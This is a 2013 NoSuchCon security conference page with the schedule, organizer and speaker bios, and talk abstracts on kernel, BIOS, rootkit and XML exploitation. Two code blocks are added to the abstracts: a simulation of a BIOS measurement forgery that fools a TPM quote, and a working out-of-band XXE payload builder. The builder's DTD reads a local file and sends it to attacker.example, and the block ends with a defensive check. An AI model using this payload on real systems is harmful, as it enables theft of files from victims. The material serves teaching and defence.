"Each time I step into this kind of conference, I am impressed with the amazing amount of skills they gather. And if I do the math, multiplying these skills by the forty-plus years of activity ahead of these young researchers, engineers, PhDs, I realize that the future of our society is precisely here. This is the new elite of this country as well as of the world, for this conference has a worldwide scope. The Ivy League and the Grandes Ecoles, so typical of the French system, are already dead as a doornail; they just haven't realized it yet."
Laurent Bloch, Security Expert & Senior Writer
FOR ANY QUESTION ABOUT THE EVENT firstname.lastname@example.org
TO BE SPONSORS email@example.com
TO SUBMIT YOUR TALK firstname.lastname@example.org
FOR ANY QUESTION ABOUT PRESS AND MEDIA PARTNERS email@example.com
FOR ANY QUESTION ABOUT THE WEBSITE firstname.lastname@example.org
HIPOTEL PARIS BELLEVILLE
21 Rue Vicq d’Azir,
75010 Paris, France
+33 1 42 08 06 70
12 Rue Louis Blanc,
75010 Paris, France
+33 1 42 08 21 40 (fax)
LIBERTEL CANAL SAINT MARTIN
5 Avenue Secrétan,
75019 Paris, France
+33 1 42 06 62 00
BUTTES CHAUMONT HOTEL PARIS
4 Avenue Secrétan,
75019 Paris, France
+33 1 42 45 33 81
232 Rue du Faubourg Saint-Martin,
75010 Paris, France
+33 1 40 34 38 50 (Fax)
PEACE & LOVE
245 Rue la Fayette,
75010 Paris, France
+33 1 46 07 65 11
124 Avenue Simón Bolívar,
75019 Paris, France
+33 1 42 08 31 17
HOTEL DE LA COMETE
196 Boulevard de la Villette,
75019 Paris, France
+33 1 42 08 55 88
NoSuchCon is a three-day conference set up by volunteer members through a non-profit organization.
The project is the offspring of well-known people of the cybercommunity, people used to international IT security conferences and, until then, organizers of Hackito Ergo Sum. Each member of the organization is, through a variety of projects, part of the international cybercommunity. The organizing team is driven by the ambition of gathering the best researchers in ethical hacking and IT security, of sharing innovation, and of informing and transmitting knowledge, with the final goal of raising the technical level of the community.
NoSuchCon presents new and exclusive content on IT security. The conference is a crucible for the different flavours of IT security: professionals, enthusiasts, hackers; renowned or more secretive. Conferences allow best practices to be shared and new trends and exclusive research to emerge, so that the challenges to come can be anticipated.
NoSuchCon is a place for both the well-known top guns of the cybercommunity and young researchers at the dawn of their career, or others presenting their results anonymously. NoSuchCon has multiple goals, but above all it wants to foster exchange, federating different communities: students, key actors of the industry, private and public sectors. It wants to make room for practical demonstrations as well as innovative theoretical findings.
The 2012 edition, which we organized at the Espace Niemeyer last April under the name Hackito Ergo Sum, gathered 56 international speakers, a top-notch roster that made for an exceptional world-class event.
Among the themes of interest: vulnerability assessment and analysis, SCADA architectures, reverse engineering, attacks on banking and telecom infrastructures, cloud computing security, botnets, threat intelligence, etc. The program committee comprises some of the best hackers and security researchers worldwide, both theoreticians and practitioners, which is a key factor in guaranteeing the quality of content. It is uniquely diverse in its international composition. Bridging frontiers and sovereignty issues, ideological and economic differences, the program committee looks for people able to share their research findings and propose new concepts.
Organizers and staff :
Cedric Blancher (Sid)
Researcher, serial-speaker, snowboarder and skydiver
Jonathan Brossard (Endrazine)
Elite computer terrorist. Old school reverse engineer. Speaker at Blackhat/CCC/Defcon.
Arnaud Malard (Sud0man)
Pentester, researcher (when I have time), skier, snowboarder and father of 2 tiny hackers.
Nicolas Ruff (Newsoft)
Security researcher, hacker, blogger, serial speaker, troll herder, happy father, and more ...
Joffrey Czarny (Sn0rky)
Security researcher, VoIP hacker, Ambassador of Happiness and Healthy Living
Relationista behind the scenes, involved in some hackers communities around the planet with an historic focus on open source and security areas.
CISO, pentester, speaker at BlackHat (long ago) and al
The flying security guy
Assistant deputy director, Propaganda Department (Propdep) -- Ministry of Truth, Bullshistan.
Graphic Design :
Valérie Micaux (athoms)
Graphic designer at home, happy girl and snowboarder
Pentester and more ...
Steven (OvertheWire), Eloi Vanderbéken
9h - 10h15
10h15 - 11h15
11h15 - 12h00
Abusing the Windows Kernel: How to Crash an Operating System With Two Instructions
Mateusz "j00ru" Jurczyk
12h - 14h
14h - 14h45
Ninjas and Harry Potter: "Spell"unking in Apple SMC Land
14h45 - 15h30
15h30 - 16h
16h - 16h45
Dumb fuzzing XSLT engines in a smart way
16h45 - 17h30
Deadly Pixels - Innovative (and pretty) exploit delivery
17h30 - 18h15
Pythonect-Fu: From Function to Language
9h - 10h
10h - 10h30
10h30 - 11h15
John Butterworth, Corey Kallenberg, Xeno Kovah
11h15 - 12h
Who'd have thought they'd meet in the middle? 'ARM Exploitation' meets "Hardware Exploitation". Sharable memoirs from a very surprising last year
Stephen A. Ridley
12h - 14h
14h - 14h45
Advanced Heap Manipulation in Windows 8
14h45 - 15h30
A hesitation step into the blackbox : Heuristic based Web-Application Reverse-engineering
Fabien Duchene, Sanjay Rawat, Jean-Luc Richier, Roland Groz
15h30 - 16h
16h - 16h45
Corroding immobilizer cryptography
16h45 - 17h30
Taint Nobody Got Time for Crash Analysis
Richard Johnson & pa_kt
17h30 - 18h15
Transporting evil code into the Business: Attacks on SAP TMS
19h - 2h
"The Party" (La Rotonde) - Metro 2, 5 or 7 Stalingrad
9h - 10h
10h - 10h30
10h30 - 11h15
Crashdmp-ster Diving the Windows 8 Crash Dump Stack
11h15 - 12h
Exploiting Hardcore Pool Corruptions in Microsoft Windows Kernel
12h - 14h
14h - 14h15
14h15 - 15h
XML Out-Of-Band Exploitation
Yunusov Timur, Alexey Osipov
15h - 15h45
Revisiting Mac OS X Kernel Rootkits
Pedro Vilaca aka fG!
15h45 - 16h15
16h - 16h45
Exploiting Game Engines For Fun And Profit
Donato Ferrante & Luigi Auriemma
16h45 - 17h45
Any Input is a Program
17h45 - 18h45
Killing RATs, the Arsenic Framework
Robinson Delaugerre & Adrien Chevalier
Andrea Barisani - Keynote Speaker
Andrea Barisani is an internationally known security researcher. Since owning his first Commodore-64 he has never stopped studying new technologies, developing unconventional attack vectors and exploring what makes things tick...and break.
His experiences focus on large-scale infrastructure administration and defense, forensic analysis, penetration testing and software development, with more than 13 years of professional experience in security consulting.
Being an active member of the international Open Source and security community he contributed to several projects, books and open standards. He is now the founder and coordinator of the oCERT effort, the Open Source Computer Security Incident Response Team.
He has been a speaker and trainer at BlackHat, CanSecWest, DEFCON, Hack In The Box, PacSec conferences among many others, speaking about TEMPEST attacks, SatNav hacking, 0-days, OS hardening and many other topics.
Dmitri Alperovitch - Keynote Speaker
Dmitri Alperovitch is the Co-Founder and CTO of CrowdStrike Inc., leading its Intelligence, Research and Engineering teams. A renowned computer security researcher, he is a thought leader on cybersecurity policies and state tradecraft. Prior to founding CrowdStrike, Dmitri was Vice President of Threat Research at McAfee, where he led the company's global Internet threat intelligence analysis.
With more than a decade of experience in the field of information security, Alperovitch is an inventor of ten patented and sixteen patent-pending technologies and has conducted extensive research on reputation systems, spam detection, web security, public-key and identity-based cryptography, malware and intrusion detection and prevention.
Thomas Lim - Keynote Speaker
Thomas Lim is the Founder and CEO of COSEINC and SyScan. Previously, as the head of IT security at one of the largest IT services companies in Singapore, he was highly disappointed to find the so-called security seminars organised by the various vendors to be nothing but a sales and marketing pitch.
In 2004, he founded SyScan, a true-blue technical and vendor-neutral IT security conference with a strong emphasis on cutting-edge security research. Today, in its 8th year, SyScan is one of the most recognised security conferences in the security community.
As for COSEINC, it is the only privately owned and funded security research company in Singapore; it became highly prominent in the security community after the publication of "BluePill", the first hardware-virtualization-based rootkit, back in 2006.
Alex Ionescu - Ninjas and Harry Potter: "Spell"unking in Apple SMC Land
It stores your File Vault (Full Volume Encryption) Password. It has a "Ninja Action Timer". It has secret "keys" that you must enable using actual spells from the Harry Potter book series. Other than full ACPI/LPC/I2C access, it has access to your battery, your fans, your thermal sensors, and your voltage regulators and can pretty much be rigged to fry them. It reacts to you sticking your palm in front of the lid, and knows when you've dropped your laptop and it's about to hit the floor. But the best part? There's no way to read its code without invasive hardware/JTAG/IDP access... while anyone can flash it behind your back. Welcome, to the world of the Apple System Management Controller.
If you think 64-bit fancy EFI bootkit persistence is awesome (thanks, Snare!), join this talk for a look at 8-bit raw SMC chipkit persistence, and other low-level mysteries.
Finally, we'll also take a look at all sorts of fun that an unprivileged user can have through the AppleSMC kernel extension.
Alex Ionescu is the Chief Architect at CrowdStrike, Inc. Alex is a world-class security architect and consultant, expert in low-level system software, kernel development, security training, and reverse engineering. He is coauthor of the last two editions of the Windows Internals series, along with Mark Russinovich and David Solomon. His work has led to the fixing of many critical kernel vulnerabilities, as well as a few dozen non-security bugs.
Previously, Alex was the lead kernel developer for ReactOS, an open source Windows clone written from scratch, for which he wrote most of the Windows NT–based subsystems. During his studies in Computer Science, Alex worked at Apple on the iOS kernel, boot loader, and drivers on the original core platform team behind the iPhone, iPad and AppleTV.
Zhenhua(Eric) Liu - Advanced Heap Manipulation in Windows 8
With the introduction of Windows 8, previously public heap/kernel pool overflow exploitation techniques are dead because of improved exploit mitigations. There are indications that compromising application-specific data, which is facilitated by heap manipulation, is becoming more popular for future exploitation.
How can the heap state be predicted as deterministically as possible?
The traditional manipulation technique (for both the kernel pool and the user heap) is to consistently defragment the heap so that future allocations become adjacent, and then to make holes in these allocations so that the vulnerable buffer, which is of similar size, falls into one of them.
In the user heap a new LFH allocator was introduced; its randomized alloc/free and guard pages made this technique hard to apply.
Beyond that, the traditional technique has limitations such as the size of the vulnerable buffer and the type of data structure that can be chosen as the attack target (especially in the kernel pool), which together mean it can no longer be considered a generic solution.
This talk aims at providing an advanced method for precisely manipulating heap layouts (kernel pool and user heap) by standing on the shoulders of a giant: "Heap Feng Shui".
Zhenhua(Eric) Liu is a Security Researcher at Fortinet (Canada) Inc. He mainly focuses on vulnerability exploitation and discovery, deep digging into security features and mitigations of OS.
He currently lives in Vancouver. He spends his free time hiking, scuba diving and playing baseball. He is also a great fan of Rock music.
Donato Ferrante & Luigi Auriemma - Exploiting Game Engines For Fun And Profit
Games are very interesting from a security perspective, with an insane number of players playing online games and companies pushing out new games at an incredible rate. This talk will focus on the security of game engines. Since multiple games usually share the same engine, finding vulnerabilities in game engines turns out to be a really attractive line of work. The talk will cover aspects of game engines, ranging from network to game protocols, from a bug hunter's point of view. The speakers will present some new 0-day vulnerabilities affecting a well-known game engine.
Donato: Co-Founder and Security Researcher at ReVuln Ltd. Prior to founding ReVuln Ltd., Donato was a Security Researcher for Research In Motion (Blackberry), where his daily job was performing security research and vulnerability assessments of RIM authored code, products and services including infrastructure, devices, and QNX operating system. Donato found several vulnerabilities in well known commercial products and open source software and his first public disclosed security advisory was released in 2003.
Luigi Auriemma: Co-Founder and Security Researcher at ReVuln Ltd. Luigi has been in the security field for more than a decade; as an independent security researcher (aluigi.org) he is a world-recognized expert in this field and has discovered more than 2000 vulnerabilities in widely used software. Some key points of Luigi's work: the highest number of security vulnerabilities disclosed in SCADA/HMI software; TV vulnerabilities; multiplayer game security. Currently the most prolific vulnerability researcher by total number of security bugs found in any software.
John Butterworth, Corey Kallenberg, Xeno Kovah - BIOS Chronomancy
In 2011 the National Institute of Standards and Technology (NIST) released a draft of Special Publication 800-155. This document provides a more detailed description than the Trusted Platform Module (TPM) PC Client specification of the content that should be measured in the BIOS to provide an adequate Static Root of Trust for Measurement (SRTM). To justify the importance of 800-155, in this talk we look at the implementation of the SRTM in a vendor's pre-800-155 laptop. We discuss how the BIOS, and thus the SRTM, can be manipulated due to a configuration error.
We also show how a 51-byte patch to the SRTM can cause it to provide a forged measurement to the TPM indicating that the BIOS is pristine. If a TPM Quote is used to query the boot state of the system, this TPM-signed falsification will then serve as the root of misplaced trust. We also show how reflashing the BIOS may not necessarily remove this trust-subverting malware. To fix the untrustworthy SRTM we apply an academic technique whereby the BIOS software attests its integrity through a timing side-channel.
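Why the forged measurement survives a TPM Quote, shown with a small simulation. This is an added illustration, not the MITRE team's code: the TPM is simulated (a PCR is a SHA-1 extend chain, the quote is an HMAC under a key that only the simulated TPM holds and that stands in for the AIK), and the BIOS image, the implant and the nonce are constructed for the example. The verifier does exactly what a remote attestation check does: verify the quote, then compare PCR0 against a golden value.

```python
"""SRTM measurement chain and why a patched SRTM defeats the TPM Quote.

Added illustration, not the speakers' code.  The TPM is simulated: a PCR is a
SHA-1 extend chain and the quote is an HMAC under a key only the TPM "holds".
BIOS images, the implant and the nonce are constructed for this example.
"""
import hashlib
import hmac

TPM_AIK_KEY = b"simulated-attestation-identity-key"   # assumption: stands in for the AIK
PCR0_INIT = bytes(20)                                  # PCRs start at all zeros

CLEAN_BIOS = b"vendor BIOS image 1.0 (constructed)"    # what the vendor shipped
IMPLANT = b"\x90attacker SMM hook (constructed)"        # what the attacker adds


def pcr_extend(pcr: bytes, digest: bytes) -> bytes:
    """TPM 1.2 extend: PCR_new = SHA1(PCR_old || digest)."""
    return hashlib.sha1(pcr + digest).digest()


def honest_srtm(bios_body: bytes) -> bytes:
    """The boot block hashes what is actually in flash and extends PCR0 with it."""
    return pcr_extend(PCR0_INIT, hashlib.sha1(bios_body).digest())


def patched_srtm(bios_body: bytes, clean_digest: bytes) -> bytes:
    """The attacker's boot block: hands the TPM a precomputed digest of the
    clean image instead of hashing flash, so PCR0 ends up at the golden value
    whatever bios_body contains.  The TPM cannot tell the difference: extend
    only ever sees the digest it is given."""
    # bios_body is deliberately not hashed
    return pcr_extend(PCR0_INIT, clean_digest)


def tpm_quote(pcr0: bytes, nonce: bytes) -> bytes:
    """Signed statement over (nonce, PCR0).  Real quotes are AIK signatures;
    an HMAC under the TPM-only key gives the same property here: a verifier
    can check it, an attacker outside the TPM cannot forge it."""
    return hmac.new(TPM_AIK_KEY, nonce + pcr0, hashlib.sha1).digest()


def verifier_accepts(pcr0: bytes, quote: bytes, nonce: bytes, golden: bytes) -> bool:
    """Remote attestation check: genuine quote AND PCR0 equals the known-good value."""
    genuine = hmac.compare_digest(tpm_quote(pcr0, nonce), quote)
    return genuine and hmac.compare_digest(pcr0, golden)


def boot(srtm, bios_body: bytes, nonce: bytes):
    """One boot: the SRTM measures, then the TPM answers a quote request."""
    pcr0 = srtm(bios_body)
    return pcr0, tpm_quote(pcr0, nonce)


GOLDEN_PCR0 = honest_srtm(CLEAN_BIOS)      # what the verifier was told to expect


def scenarios(nonce: bytes = b"challenge-0001") -> dict:
    """Three boots; True means the remote verifier trusted the platform."""
    clean_digest = hashlib.sha1(CLEAN_BIOS).digest()
    cases = {
        "clean BIOS, intact SRTM": (honest_srtm, CLEAN_BIOS),
        "implant, intact SRTM": (honest_srtm, CLEAN_BIOS + IMPLANT),
        "implant, patched SRTM": (lambda body: patched_srtm(body, clean_digest),
                                  CLEAN_BIOS + IMPLANT),
    }
    results = {}
    for name, (srtm, image) in cases.items():
        pcr0, quote = boot(srtm, image, nonce)
        results[name] = verifier_accepts(pcr0, quote, nonce, GOLDEN_PCR0)
    return results


if __name__ == "__main__":
    for name, accepted in scenarios().items():
        print(f"{name:28s} -> {'trusted' if accepted else 'rejected'}")
```

The third case is the talk's point: the quote is genuine and PCR0 matches, yet the BIOS carries the implant, because the only thing the verifier ever learns about flash is what the SRTM chose to hash. Reflashing the BIOS body changes nothing if the patched boot block is what survives the reflash, and a check that targets the measuring code itself, such as the timing-based approach the talk applies, is aimed at exactly this gap.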
John Butterworth is a security researcher at The MITRE Corporation. John specializes in low-level system security and development. John's current focus is on BIOS/UEFI security.
Corey Kallenberg is a security researcher currently employed by The MITRE Corporation. Corey specializes in low level system development, vulnerability discovery and exploitation, and rootkit analysis. Corey's current focus is on BIOS/UEFI security.
Xeno Kovah is a security researcher currently employed by The MITRE Corporation. Xeno specializes in Windows kernel development, reverse engineering and malware analysis. Xeno is the founder of opensecuritytraining.info, a website that offers free security training.
Stephen A. Ridley - Who'd have thought they'd meet in the middle? 'ARM Exploitation' meets "Hardware Exploitation". Sharable memoirs from a very surprising last year
In this talk (which was in part delivered at Breakpoint 2012 and Infiltrate 2013) we will discuss our recent research that is being rolled into our Practical ARM Exploitation course on Linux and Android (for embedded applications and mobile devices). We will also demonstrate these techniques and discuss how we were able to discover them using several ARM hardware development platforms that we custom built.
Lastly, we will also discuss some of our most recent related hardware research (done to facilitate the above), which will include bus protocol eavesdropping/reverse engineering, demystifying hardware debugging, and surreptitiously obtaining embedded software (firmware) using hardware techniques. We will demonstrate and show the supporting tools used and techniques developed to perform this work and deploy them against Apple MFi iAP devices and multimedia devices using OEM-implemented USB stacks. Along the way we will inevitably share some of the lessons we learned while completely designing the hardware (from scratch), writing the firmware (and mobile apps) for an embedded security device we hold the patent for and will be publicly releasing within the next month.
Stephen A. Ridley is a security researcher with more than 10 years of experience in software development, software security, and reverse engineering. Currently at Accipiter Research, Mr. Ridley oversees a small security research team in addition to leading product development for Accipiter's embedded security devices (due for public release in Q2 2013). Before his work at Accipiter, Mr. Ridley served as the Chief Information Security Officer of a financial services firm. Prior to that he was Senior Researcher at Matasano, a Manhattan-based security research and development firm. He also was Senior Security Architect at McAfee, and a founding member of the Security and Mission Assurance (SMA) group at a major U.S. defense contractor, where he did vulnerability research and reverse engineering in support of the U.S. Defense and Intelligence community.
Mr. Ridley has spoken at and performed trainings at industry conferences such as BlackHat, ReCon, EuSecWest, CanSecWest, Syscan, Breakpoint, Infiltrate and others. Mr. Ridley is the author of a few upcoming books, one of which is "Android Hacker's Handbook", to be published by Wiley and Sons.
Mateusz "j00ru" Jurczyk - Abusing the Windows Kernel: How to Crash an Operating System With Two Instructions
The Microsoft Windows NT family of operating systems has come a long way over the last two decades, from an unstable and extremely insecure environment to a relatively secure system incorporating numerous effective exploit mitigations against both local and remote attacks. While many would agree that identifying and taking advantage of Local Elevation of Privilege vulnerabilities has since become a more difficult task that now requires specialist knowledge, the presentation will discuss how some core kernel components can still be considered extremely fragile and even useful in practical local attacks, including breaches of widely deployed sandboxing technologies. We will focus on non-trivial quirks, exploitation of certain scenarios and amusing bugs or behaviors that made it into Windows NT 3.1 and remained unnoticed until Windows 7 or 8, likely with some low- to medium-severity 0-day security flaws mixed in.
Mateusz is a big fan of memory corruption. His main areas of interest are client software security, vulnerability exploitation and mitigation techniques, and delving into the darkest corners of low-level kernel internals with a very strong emphasis on Microsoft Windows. He is currently working as an Information Security Engineer at Google.
Richard Johnson & pa_kt - Taint Nobody Got Time for Crash Analysis
The last decade has seen a large focus on vulnerability discovery automation with various methods of fuzzing and input generation; however, little has been said about crash analysis or triage. This talk will discuss a powerful toolchain for crash analysis that incorporates the best available approaches for automated reasoning about memory access violation exceptions and overcomes limitations in currently available tools such as !exploitable and crashwrangler.
In particular, we will discuss three key areas: dynamic taint analysis to track areas of memory that are influenced by user-controlled data, forward and backward taint slicing to isolate input bytes that lead to the crashing state, and finally forward symbolic execution to determine if the input can be modified to reach an alternate state giving more control over the execution of the program. In other words, our system will isolate the input bytes causing the crash and try to determine if your ReadAV can actually be turned into a WriteAV or code execution.
This toolchain is designed to plug into a standard fuzzing system to help complete the automation loop for vulnerability discovery and triage. We also include a GUI component for utilizing the data within IDA Pro. This project will be freely available to the public during the summer of 2013. The core concepts can also be adapted for use in malware analysis and vulnerability discovery.
Richard Johnson is a computer security specialist who spends his time playing in the realm of software vulnerability analysis. Richard currently fills the role of Principal Research Engineer on Sourcefire's Vulnerability Research Team, offering over 10 years of expertise in the software security industry. Current responsibilities include research on exploitation technologies and automation of the vulnerability triage and discovery process. Past areas of research include memory management hardening, compiler mitigations, disassembler and debugger design, and software visualization. Richard has released public code for binary integrity monitoring, program debugging, and reverse engineering and has presented at dozens of conferences worldwide since 2004. Richard is also a co-founder of the Uninformed Journal and a long-time resident of the Hick.org ranch.
pa_kt is a Senior Research Engineer on Sourcefire's Vulnerability Research team. 10+ years of experience in reverse engineering in various roles (such as malware analyst or vulnerability researcher) and an MSc in computer science help him fulfil his current responsibilities at Sourcefire, which include (but are not limited to) automating various stages of vulnerability discovery and triage.
Nikita Tarakanov - Exploiting Hardcore Pool Corruptions in Microsoft Windows Kernel
With each new version of Windows, Microsoft enhances security by adding mitigation mechanisms; kernel-land vulnerabilities are getting more and more valuable these days. For example, the easy way to escape from a sandbox (the Google Chrome sandbox, for example) is by using a kernel vulnerability. That's why Microsoft struggles to enhance the security of the Windows kernel.
The kernel pool allocator plays a significant role in the security of the whole kernel. Since Windows 7, Microsoft has been enhancing the security of the Windows kernel pool allocator. Tarjei Mandt aka @kernelpool has done a great job analyzing the internals of the Windows kernel pool allocator and found some great attack techniques, mitigation bypasses, etc. In Windows 8, however, Microsoft has eliminated almost all reliable techniques for exploiting kernel pool corruptions. Tarjei's attack techniques need a lot of prerequisites to succeed, and there are many types of pool corruption where, unfortunately, they don't work.
What if there is no control over the overflowing data? What if it is constant (zero bytes) and you have no chance to apply one of Tarjei's techniques? What if there is an uncontrolled continuous overflow and a #PF and BSOD are unavoidable?
So what to do? Commit suicide instantly? NO! Come and see this talk! We present a technique for 100% reliable exploitation of kernel pool corruptions which covers all flavors of Windows from NT 4.0 to Windows 8.
Nikita Tarakanov is an independent information security researcher who has worked as an IS researcher in Positive Technologies, VUPEN Security and CISS. He likes writing exploits, especially for Windows NT Kernel and won the PHDays Hack2Own contest in 2011 and 2012. He also tried to hack Google Chrome during Pwnium 2 at HITB2012KUL but failed. He has published a few papers about kernel mode drivers and their exploitation and is currently engaged in reverse engineering research and vulnerability search automation.
Saumil Shah - Deadly Pixels - Innovative (and pretty) exploit delivery
What do you get if you combine art with an exploit? "Deadly Pixels" is the fine art (pun intended) of packaging exploits. The result is a pretty picture with not-so-pretty after effects. This is not another talk about packers and crypters when it comes to exploit delivery. We are talking eye candy, visual appeal, style! A successful exploit is one that is delivered with style. This talk explores several sneaky, funny, silly and creative techniques for delivering exploits right to your doorstep with zero interference from content-filtering or anti-virus.
Demos, demos everywhere. Seeing is believing, and this talk is all about pretty pictures anyway.
Thought provoking discussions on newer and more innovative ways of disguising and delivering exploits. The future of browsers. The future of web content. Futility of signature based blacklisting. For the attacker it is all about how to get really sneaky. For the defender it is all about turning what is theoretical into practical reality.
Precursors to these techniques were presented at Hack in the Box Kuala Lumpur 2012 and DeepSec 2012. Since then, two more techniques have been added and two entirely new toolkits built. I'm open sourcing them too. The previous presentations were based on early experimentation. Since then I have received a lot of feedback and input and shall be applying it all in this presentation.
Saumil Shah is the founder and CEO of Net-Square, providing cutting edge information security services to clients around the globe. Saumil is an internationally recognized speaker and instructor, having regularly presented at awesome conferences like Deepsec, Blackhat, RSA, CanSecWest, PacSec, EUSecWest, Hack.lu, Hack-in-the-box and others. He has authored two books titled "Web Hacking: Attacks and Defense" and "The Anti-Virus Book".
Saumil graduated with an M.S. in Computer Science from Purdue University, USA and a B.E. in Computer Engineering from Gujarat University. He spends his leisure time breaking software, flying kites, traveling around the world and taking pictures.
Pedro Vilaca aka fG! - Revisiting Mac OS X Kernel Rootkits
This presentation is about old school kernel extension rootkits in Mac OS X. The main motivation behind it is that there are no up-to-date, state-of-the-art rootkits for OS X! Well, Dino talked about a VT-x one but that code never became public. What we have these days is really lame commercial spyware being sold to govs and other shady entities for 200k. They are shameful to the great art of writing rootkits! Everything else (public) is too old and not fun anymore. Even the recently released Rubilyn doesn't work in Mountain Lion and is too simplistic in its approach. All this kind of sucks because the OS X kernel is an interesting place and needs some rootkit love.
The whole research and its results are based on two very simple ideas that open the door to many new possibilities to take control and hack the OS X kernel via kernel extensions (or IOKit drivers). Simple things usually work better!
An Economist with an evil mind (certified by a MBA) and a knack for IT. I really hate this third person thing :-) Call it ego integer overflow!
Karsten Nohl - Corroding immobilizer cryptography
Immobilizers have for a long time increased the difficulty of stealing cars. Older immobilizer transponders defeated thieves by requiring non-trivial RF skills for copying keys. Current transponders go one step further by employing cryptographic functions with the potential of making car cloning as difficult as breaking long-standing mathematical problems. Cryptography, however, is only as strong as the weakest link of key management, cipher strength, and protocol security. This talk discusses weak links of the main immobilizer technologies and their evolution over time.
Karsten Nohl is a cryptographer and security researcher. He likes to test security assumptions in proprietary systems and typically breaks them.
Nicolas Gregoire - Dumb fuzzing XSLT engines in a smart way
In 2012, I decided to fuzz every well-known C-based XSLT engine. Not having the horsepower of Google, I chose to fuzz the XSLT engines themselves and not the applications using them. This leads to funny situations like finding bugs impacting Adobe Reader while testing an old open-source library instrumented with AddressSanitizer. Vulnerabilities in Chrome, Adobe Reader, Microsoft IE, Oracle DB, ... were found.
Nicolas Gregoire has more than 12 years of experience in penetration testing and auditing of networks and (mostly Web) applications. He founded Agarri, a small company where he finds security bugs for customers and for fun. His research was presented at numerous conferences around the world (Hack in the Box, HackInParis, ZeroNights, ...) and he was publicly thanked by some well known vendors (Microsoft, Adobe, Mozilla, Google, Apple, VMware, ...) for responsibly disclosing vulnerabilities in their products.
Sergey Bratus - Any Input is a Program
Sergey Bratus is a Research Assistant Professor of Computer Science at Dartmouth College. He tries to help fellow academics to understand the value and relevance of hacker research. It is his ambition to collect and classify all kinds of weird machines; he is also a member of the http://langsec.org conspiracy to eliminate large classes of bugs.
Aaron LeMasters - Crashdmp-ster Diving the Windows 8 Crash Dump Stack
The Microsoft Windows crash dump mechanism is perhaps one of the most crucial undocumented components to have survived the scrupulous eyes of reverse engineers and Windows internals experts for so long. Tucked away discreetly in the bowels of the operating system, the undocumented crash dump stack provides the operating system a powerful, fast and independent I/O path to the boot device used for various internal purposes (crash dump file generation, hibernation, and fast boot in Windows 8). Microsoft has provided some sparse and vague documentation for selective aspects of the crash dump stack, but only enough to expose the absolute minimum knowledge necessary for kernel driver developers to integrate their software. Past research has revealed that the crash dump driver stack can be manipulated using various bypass techniques to read and write to a mass storage device outside normal operating system use. While past research focused on advanced techniques to manipulate the lowest-level disk drivers in the crash dump driver stack (the dump port and miniport drivers) to use the crash I/O path outside its intended environment, this paper explores the secrets of the crashdmp.sys driver, a component introduced in Windows Vista to house crash dump stack related code formerly in the kernel. In contrast to prior research, this paper studies the relationship between crashdmp.sys and crash filter drivers and presents a new technique to use the crash I/O path when the stack is in use during a system crash or hibernation by leveraging new crash dump logging features introduced in Windows 8.
Aaron LeMasters is a Senior Security Researcher at CrowdStrike. He is currently contributing to the development of the company's flagship product and related research tasks. Prior to joining CrowdStrike, Aaron was a researcher/developer at Mandiant, where his primary roles involved writing code for the company's product and designing countermeasures for advanced rootkits through reverse engineering.
Aaron is a co-author of Hacking Exposed: Malware and Rootkits, (October 2009, McGraw-Hill). He earned a Master of Science, Computer Science and Information Assurance, from The George Washington University, and a Bachelor of Science in Computer Science from Mississippi State University.
Aaron has blogged regularly at past jobs on various technical topics and has spoken at a number of Information Security industry conferences such as Blackhat USA and Syscan. His most recent personal research project is http://crashd.mp, a website dedicated to cataloging information about the Windows crash dump mechanism.
Timur Yunusov, Alexey Osipov - XML Out-Of-Band Exploitation
The proposed approach makes it possible to attack internal networks even when no direct connection exists from the attacker to the vulnerable XML parser. Moreover, client applications, as well as server-side services, are subject to this vulnerability: a victim's XML parser opening a susceptible file lets the remote attacker build an interactive shell from which he can read the victim's local files. The techniques are not limited to DTD/entity tricks but also cover different extensions of XML (such as XSLT, XPath and XInclude). The presentation will focus on practical demonstration of exploitation using these techniques. It will be shown that different products from different widespread vendors are affected, with special mention of security tools (Trustwave ModSecurity) and different IDEs (Siemens ICS products, MS Visio, MS Visual Studio).
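The parameter-entity chain behind the out-of-band technique, as an added example (not the speakers' tooling): the attacker builds the two pieces of the payload, reads the exfiltrated bytes back out of the request his listener receives, and, on the defending side, gates documents before they reach a parser. The collector host http://attacker.example and the sample request line are constructed.

```python
"""Out-of-band XXE: attacker-side payload builder and exfiltration decoder.

Added example for this page; it is not the speakers' tooling. The collector
host (http://attacker.example) and the sample request line are constructed.
"""
import re
from urllib.parse import parse_qs, urlsplit

COLLECTOR = "http://attacker.example"  # assumption: attacker-controlled listener


def build_oob_dtd(target_file: str, collector: str = COLLECTOR) -> str:
    """DTD served by the attacker.

    %file  reads the target file on the victim.
    %eval  declares a second parameter entity whose SYSTEM URI embeds the
           expansion of %file in a query string.  A literal '%' is not
           allowed inside an entity value, hence the &#x25; character
           reference.
    %exfil, once expanded, makes the victim's parser fetch the collector
           URL, which carries the file contents to the attacker.
    """
    return (
        f'<!ENTITY % file SYSTEM "file://{target_file}">\n'
        f'<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM '
        f"'{collector}/?d=%file;'>\">\n"
        "%eval;\n"
        "%exfil;\n"
    )


def build_document(dtd_url: str) -> str:
    """The document handed to the victim: it only pulls in the remote DTD,
    so the payload itself never has to be in the file the victim receives."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE data [ <!ENTITY % remote SYSTEM "{dtd_url}"> %remote; ]>\n'
        "<data/>\n"
    )


def recover_exfil(request_line: str) -> str:
    """Decode the exfiltrated value from one HTTP request line seen by the
    collector, e.g. 'GET /?d=root%3Ax%3A0%3A0 HTTP/1.1'."""
    _method, target, _version = request_line.split(" ", 2)
    return parse_qs(urlsplit(target).query).get("d", [""])[0]


# Defender side: an external DTD (SYSTEM/PUBLIC in the DOCTYPE) or any
# parameter entity ("<!ENTITY %") is what this attack family needs.
_EXTERNAL_DTD = re.compile(rb"<!DOCTYPE[^>]*?\b(SYSTEM|PUBLIC)\b|<!ENTITY\s+%",
                           re.IGNORECASE)


def references_external_dtd(xml_bytes: bytes) -> bool:
    """Pre-parse check: flag documents that declare an external DTD or a
    parameter entity. Legitimate documents rarely need either, so rejecting
    them before the parser runs blocks the attack regardless of which parser
    or XML extension sits behind the endpoint."""
    return _EXTERNAL_DTD.search(xml_bytes) is not None
```

The collector receives the file as a query string, so a target containing newlines or other characters that are illegal in a URI makes the victim's fetch fail; real-world tooling works around that with other URI schemes or by encoding the content before it is embedded, which this example does not do. references_external_dtd is a coarse gate for a proxy or WAF-style check, not a substitute for turning off DTD and external-entity processing in the parser itself.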
Timur Yunusov, Web Application Security Researcher. Author of multiple research works in the field of web application security (including "Bruteforce of PHPSESSID", rated in the Top Ten Web Hacking Techniques of 2012 by WhiteHat Security). Professional pentester of web applications.
ScadaStrangeLove team member
